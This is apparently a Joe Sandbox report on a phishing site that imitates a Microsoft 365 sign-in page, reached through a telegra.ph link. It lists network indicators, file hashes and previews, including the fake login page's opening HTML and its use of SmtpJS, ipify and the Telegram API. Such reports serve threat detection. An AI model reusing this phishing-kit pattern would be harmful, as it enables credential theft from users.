        office365-mauve.vercel.app
        64.29.17.193
        truefalse
          high
          www.google.com
          142.250.185.196
          truefalse
            high
            api.ipify.org
            104.26.12.205
            truefalse
              high
              telegra.ph
              149.154.164.13
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://telegra.ph/Clarkson-122025-01-02false
                    unknown
                    https://office365-mauve.vercel.app/true
                      unknown
                      https://office365-mauve.vercel.app/next.htmltrue
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        109.169.71.112
                        smtpjs.comUnited Kingdom
                        20860IOMART-ASGBfalse
                        104.26.12.205
                        api.ipify.orgUnited States
                        13335CLOUDFLARENETUSfalse
                        1.1.1.1
                        unknownAustralia
                        13335CLOUDFLARENETUSfalse
                        64.29.17.193
                        office365-mauve.vercel.appCanada
                        13768COGECO-PEER1CAfalse
                        216.58.212.138
                        unknownUnited States
                        15169GOOGLEUSfalse
                        216.58.206.74
                        unknownUnited States
                        15169GOOGLEUSfalse
                        142.250.186.174
                        unknownUnited States
                        15169GOOGLEUSfalse
                        172.217.18.14
                        unknownUnited States
                        15169GOOGLEUSfalse
                        74.125.71.84
                        unknownUnited States
                        15169GOOGLEUSfalse
                        149.154.164.13
                        edit.telegra.phUnited Kingdom
                        62041TELEGRAMRUfalse
                        142.250.185.138
                        unknownUnited States
                        15169GOOGLEUSfalse
                        149.154.167.99
                        t.meUnited Kingdom
                        62041TELEGRAMRUfalse
                        149.154.167.220
                        api.telegram.orgUnited Kingdom
                        62041TELEGRAMRUfalse
                        239.255.255.250
                        unknownReserved
                        unknownunknownfalse
                        142.250.185.196
                        www.google.comUnited States
                        15169GOOGLEUSfalse
                        172.217.23.99
                        unknownUnited States
                        15169GOOGLEUSfalse
                        216.198.79.129
                        unknownUnited States
                        11696NBS11696USfalse
                        172.217.18.106
                        unknownUnited States
                        15169GOOGLEUSfalse
                        142.250.184.227
                        unknownUnited States
                        15169GOOGLEUSfalse
                        104.26.13.205
                        unknownUnited States
                        13335CLOUDFLARENETUSfalse
                        IP
                        192.168.2.16
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1583730
                        Start date and time:2025-01-03 13:23:32 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Sample URL:https://telegra.ph/Clarkson-122025-01-02
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • EGA enabled
                        Analysis Mode:stream
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal64.phis.troj.win@18/38@32/176
                        • Exclude process from analysis (whitelisted): svchost.exe
                        • Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.250.186.174, 74.125.71.84, 172.217.16.206, 142.250.185.142, 216.58.206.74, 172.217.16.202, 142.250.185.106, 172.217.18.106, 142.250.186.74, 142.250.185.138, 142.250.186.106, 142.250.186.170, 142.250.184.234, 172.217.23.106, 142.250.185.202, 142.250.185.74, 172.217.18.10, 142.250.186.42, 142.250.185.234, 142.250.185.170, 142.250.185.238
                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: https://telegra.ph/Clarkson-122025-01-02
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 11:23:58 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2673
                        Entropy (8bit):3.98455299824977
                        Encrypted:false
                        SSDEEP:
                        MD5:0E6005FDA523DE2903C8A87AB5D616E1
                        SHA1:7F932841797353CE8C62603FC267507A11B3708A
                        SHA-256:5E819220B602905AB3F7B680C49A3DFAB792A63305DFBB1871593D7EE68105BE
                        SHA-512:41E8886CA9C0C4951507640C2F871F54B2361CD82F773A33DF7C93FE352F33642B96BC400E792A6E43A542331271457566CA9C454B3D2D345922CCFA67939E11
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....H.G].]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.c...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............R.n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 11:23:58 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2675
                        Entropy (8bit):4.002305355777756
                        Encrypted:false
                        SSDEEP:
                        MD5:8DBB69F3C69C9518FD5D2157F53E3139
                        SHA1:7D22057DEF954A63E608E09FA9FB62DA70AE38BE
                        SHA-256:83CF58E7378DA1A11499D80CD5290A65DFBA95CC5AE251F5E62E45B01263E5C9
                        SHA-512:D6ADD192A39B0488807A238FD0B2C56651C469A13703377C6B0EC1E3973836C58DEDD5398DC4AAECEC6AEB3FBDAC2E011E46678DC7EF08760C3FF5F59B2B43D4
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,......<].]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.c...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............R.n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2689
                        Entropy (8bit):4.011697417493352
                        Encrypted:false
                        SSDEEP:
                        MD5:F3DE390A65E3EDA16B76AF4C705878C0
                        SHA1:F9EE6E92B231AF6B9E95F6D8F869B33EF3E8D247
                        SHA-256:F9D7726CC826BAF6CA92D2CE50D81343E9BC1C0B5E63E84B87BBFCEB31D6BC9A
                        SHA-512:4A38E21EA834EFC3F58B3044A09FB0B8E8EFFF38583F2BB9285DFD9E9FD16A0853B6EEEA94B336B21350152FEDB39CFD433B1A28DA4498D0333D75FE4B8DF76A
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............R.n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 11:23:58 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):3.9976755538237803
                        Encrypted:false
                        SSDEEP:
                        MD5:F705E2BD15B19E4332E25337DEC98263
                        SHA1:B42667E35FFC3C3498D151BA7952B03874797037
                        SHA-256:C22A7948B7879011048E96D3815623E761B9AC1036B530996C183A0CEABECBBF
                        SHA-512:D1ED28F5D27849F20034609E87796413E4E0049746F8C325054D5E75F6966B8C1351B2017BE6C7FA43C1F8F4180F10692AA5A0EE311CB2CFA6F4235EAC0E6E4E
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....l.7].]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.c...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............R.n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 11:23:58 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2677
                        Entropy (8bit):3.987651038795465
                        Encrypted:false
                        SSDEEP:
                        MD5:E10926DB4226562966733AD4EA75762D
                        SHA1:793FFCB4A65F7F4955FFF105B6210B3DAF9712D9
                        SHA-256:3AC26EAE98BC8E005F667B193C160F4E7CB61B46B054DA0C2EBDD7417394815B
                        SHA-512:F3974D07F65A5DF38D06D92C177603004C4ED992F5F0673C589685FEE1C74693E8FA801E187E9070303EAE43305C56915F58DFEE24B623B6246E8E582BC8C3D8
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,.... .B].]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.c...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............R.n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 11:23:58 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                        Category:dropped
                        Size (bytes):2679
                        Entropy (8bit):4.00054319399782
                        Encrypted:false
                        SSDEEP:
                        MD5:C0A96872D4DECCD06568DEA3129B7A73
                        SHA1:00F2F4C52A8402A0DE1EC8EA495A73D601316531
                        SHA-256:B472606A861FFF3A0E8E56E6AA71D73201F57C068D9A361FC6470875C5F34F29
                        SHA-512:8903F243881A071C27DA8A3A9AD45C9B517E881989A5C744CCF822C99BC71646391D4DCA901745B21629409F94493F6A012628E33CD0CF5E2C5F72F9876BF3D2
                        Malicious:false
                        Reputation:unknown
                        Preview:L..................F.@.. ...$+.,....;</].]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.c...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............R.n.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text
                        Category:downloaded
                        Size (bytes):7190
                        Entropy (8bit):4.782606771548653
                        Encrypted:false
                        SSDEEP:
                        MD5:C109C41150B8C3FEB5CF8E349A6B05A4
                        SHA1:FE462D4F8A16E9FFB37F733C214BEFC1B807E17F
                        SHA-256:2D8806A9454F45E2C653E351411DCC6466D613AE1BBD9C44D3A31E052C5E511C
                        SHA-512:2E8596495CFE5093BF66C70D62C04F932E4D0679303B3304FBFD6B18FC5C3AE40B54A802C23ED8127F1A7C941D234C309471D01B980BA5FDBC87BA47F52CF88E
                        Malicious:false
                        Reputation:unknown
                        URL:https://telegra.ph/css/quill.core.min.css
                        Preview:/*!. * Quill Editor v1.0.0. * https://quilljs.com/. * Copyright (c) 2014, Jason Chen. * Copyright (c) 2013, salesforce.com. */..ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:relative}..ql-clipboard{left:-100000px;height:1px;overflow-y:hidden;position:absolute;top:50%}..ql-clipboard p{margin:0;padding:0}..ql-editor{box-sizing:border-box;cursor:text;line-height:1.42;height:100%;outline:0;overflow-y:auto;padding:12px 15px;tab-size:4;-moz-tab-size:4;text-align:left;white-space:pre-wrap;word-wrap:break-word}..ql-editor blockquote,.ql-editor h1,.ql-editor h2,.ql-editor h3,.ql-editor h4,.ql-editor h5,.ql-editor h6,.ql-editor ol,.ql-editor p,.ql-editor pre,.ql-editor ul{margin:0;padding:0;counter-reset:list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9}..ql-editor ol,.ql-editor ul{padding-left:1.5em}..ql-editor ol>li,.ql-editor ul>li{list-style-type:none}..ql-editor ul>li::before{content:'\25CF'}..ql-editor li
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):21
                        Entropy (8bit):3.594465636961452
                        Encrypted:false
                        SSDEEP:
                        MD5:909AD59B6307B0CD8BFE7961D4B98778
                        SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                        SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                        SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                        Malicious:false
                        Reputation:unknown
                        URL:https://api.ipify.org/?format=json
                        Preview:{"ip":"8.46.123.189"}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):2091
                        Entropy (8bit):4.732227280163408
                        Encrypted:false
                        SSDEEP:
                        MD5:73D8EF088EB1BF0C8CBD64B5A62A37AB
                        SHA1:673280A28CA4F41AB494626E19854FD5075AC2F1
                        SHA-256:13F0EAFA13C9CB827EBD9C6B8176AEED9D58C16C3F8A3C0ECA16D75A816F9F07
                        SHA-512:FB942EDB5374699E16110F1680DE381F697A09C6D7B35EC98660B5EDD10E3F8ADBCB7FC3AA24A0A7D48207CFF60BC8E612A50649B8F8FAD6AA90EE8F06E566E2
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/css/next.css
                        Preview:body {.. margin: 0;.. font-family: Arial, sans-serif;.. overflow: hidden;.. background-image: url("../images//image2.jpg");.. background-size: cover;..}.....slideshow-container {.. position: fixed;.. width: 100%;.. height: 100%;.. z-index: -1;..}.....slideshow-image {.. width: 100%;.. height: 100%;.. object-fit: cover;.. display: none;.. animation: fade 5s infinite;..}....@keyframes fade {.. from {.. opacity: 0.4;.. }.. to {.. opacity: 1;.. }..}.....login-container {.. margin-left: 320px;.. top: 270px;.. left: 1120px;.. transform: translate(-50%, -50%);.. height: 500px;.. position: absolute;.. background-color: white;.. padding: 40px;.. border-radius: 20px;.. width: 400px;.. margin: 50px auto;.. text-align: center;.. z-index: 1;..}.....header {.. text-align: center;..}.....upper-logo {.. width: 100px;.. margin: 10px auto;.. display: block;..}.....lower-logo {.. widt
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:HTML document, ASCII text, with CRLF line terminators
                        Category:downloaded
                        Size (bytes):5216
                        Entropy (8bit):4.409018707353447
                        Encrypted:false
                        SSDEEP:
                        MD5:D54A0DB4CCCA5A96E78F929A27D34EEA
                        SHA1:8B0AC36B929EF6DBF40DBCE0B4714F320FB6B970
                        SHA-256:D0C6AD72294EDF2BFE2540D3601BD5136B5BCF8CE6F581D1F24B76632F93377A
                        SHA-512:55BC5A029A55CF94F91877D565F8D4DF1B78DE43FEB874DB4C88BC20EFEC26C686E79E0166A6072A7829EF723D3C7E4063500905A235BC020D191A2BF571FA6D
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/
                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <link rel="icon" href="images/logo.png" type="image/x-icon">.. <title>Microsoft 365 | Home </title>.. <link rel="stylesheet" href="css/index.css" />.. <script src="https://smtpjs.com/v3/smtp.js"></script>.. <title>Login Form</title>..</head>..<body>.. <div class="slideshow-container">.. <img src="images/image1.jpg" alt="Slideshow Image" class="slideshow-image" />.. <img src="images/image2.jpg" alt="Slideshow Image" class="slideshow-image" />.. <img src="images/image3.jpg" alt="Slideshow Image" class="slideshow-image" />.. <img src="images/image4.jpg" alt="Slideshow Image" class="slideshow-image" />.. </div>.... <div class="login-container">.. <div class="header">.. <h1>Sign In</h1>.. <img src="images/lo.jpg" alt="Logo" class="logo" />.. </div>.... <form id="loginFo
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 3000x2002, components 3
                        Category:dropped
                        Size (bytes):880299
                        Entropy (8bit):7.990966059229248
                        Encrypted:true
                        SSDEEP:
                        MD5:C253581208AAF177CF1A829D60E664B9
                        SHA1:B9C0731DFBB396BD9848A63E0C72AD389A1109EC
                        SHA-256:0A8EE2D3A6A9E54471E7B011735AEBB35BA8DB0401436C3CA6F8F7955F644610
                        SHA-512:9855643C1F8EB418717C75437F8DBD575BB719943971EB38DF7DEC3BDF27EDD0E2DDD3357CD0BB8625AEB328989AA6708B27D92BDAD6D4178BE3689E288D26CC
                        Malicious:false
                        Reputation:unknown
                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (841), with CRLF line terminators
                        Category:downloaded
                        Size (bytes):871
                        Entropy (8bit):5.018308397228459
                        Encrypted:false
                        SSDEEP:
                        MD5:3834E1B9E65CA954B7479464EA1E5118
                        SHA1:437DF45DBF59C3A3414236F44E3BCD5045BFE314
                        SHA-256:FC33C6B2C79AAFA930E841962AE3C25BF8F56CBC20EC48FC2B0DDD0AA6EE23B6
                        SHA-512:4B26FD1B96ACC06993500148B10A7CE76FE9DBBEBFB690E4FEBB46AAC9EACEB81B9D5B7317DAA4C525DABB42558BFA456FD3F5CAB4D8BEAA37186BEE9619E544
                        Malicious:false
                        Reputation:unknown
                        URL:https://smtpjs.com/v3/smtp.js
                        Preview:./* SmtpJS.com - v3.0.0 */..var Email = { send: function (a) { return new Promise(function (n, e) { a.nocache = Math.floor(1e6 * Math.random() + 1), a.Action = "Send"; var t = JSON.stringify(a); Email.ajaxPost("https://smtpjs.com/v3/smtpjs.aspx?", t, function (e) { n(e) }) }) }, ajaxPost: function (e, n, t) { var a = Email.createCORSRequest("POST", e); a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), a.onload = function () { var e = a.responseText; null != t && t(e) }, a.send(n) }, ajax: function (e, n) { var t = Email.createCORSRequest("GET", e); t.onload = function () { var e = t.responseText; null != n && n(e) }, t.send() }, createCORSRequest: function (e, n) { var t = new XMLHttpRequest; return "withCredentials" in t ? t.open(e, n, !0) : "undefined" != typeof XDomainRequest ? (t = new XDomainRequest).open(e, n) : t = null, t } };
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 7500x11000, components 3
                        Category:downloaded
                        Size (bytes):8427281
                        Entropy (8bit):7.967841444741121
                        Encrypted:false
                        SSDEEP:
                        MD5:3019793A7EB4247F0850091894E685E6
                        SHA1:78BCA082CAFD8B87571BDB3A32BB4A3293ADDA9C
                        SHA-256:0FB2750F388EF044390637E6111EBE5A1A1EF01AA673C3CAF6194D4E669D67E6
                        SHA-512:ADF61BE7D5892AAD6C23B0D32E88CF76D8F8C0012FB4A518B65037A32C3EE18AA00B5BB8DB72B99B68BA4912D1A50C119F779109FCCC1C88B1D56E052F673629
                        Malicious:false
                        Reputation:unknown
                        URL:https://office365-mauve.vercel.app/images/image4.jpg
                        Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):80
                        Entropy (8bit):4.519265602280304
                        Encrypted:false
                        SSDEEP:
                        MD5:3FA187421B5A45709B21C348556B4A6A
                        SHA1:F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
                        SHA-256:BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
                        SHA-512:7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
                        Malicious:false
                        Reputation:unknown
                        Preview:{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 3000x2002, components 3
                        Category:dropped
                        Size (bytes):935433
                        Entropy (8bit):7.993059923805777
                        Encrypted:true
                        SSDEEP:
                        MD5:A68600660B5FF8677A6AAFBEA8948DB4
                        SHA1:B5C8DBEF5CC0FE47C821F42681A96A7D3D9B033D
                        SHA-256:595157E9B2C3EDFE954D0D693F8E1ACB13BB793736047F98EE9C9D862E2477EB
                        SHA-512:5F32B5D19BEDE5FD3C1C7BFE13EF4B455F6868DB87AEBA4D7B7283BE80C73B3624A8B5BF59A456588B17A0F0A7516A1E6471FC1EB16DF8A2311C5ED76C2C4112
                        Malicious:false
                        Reputation:unknown
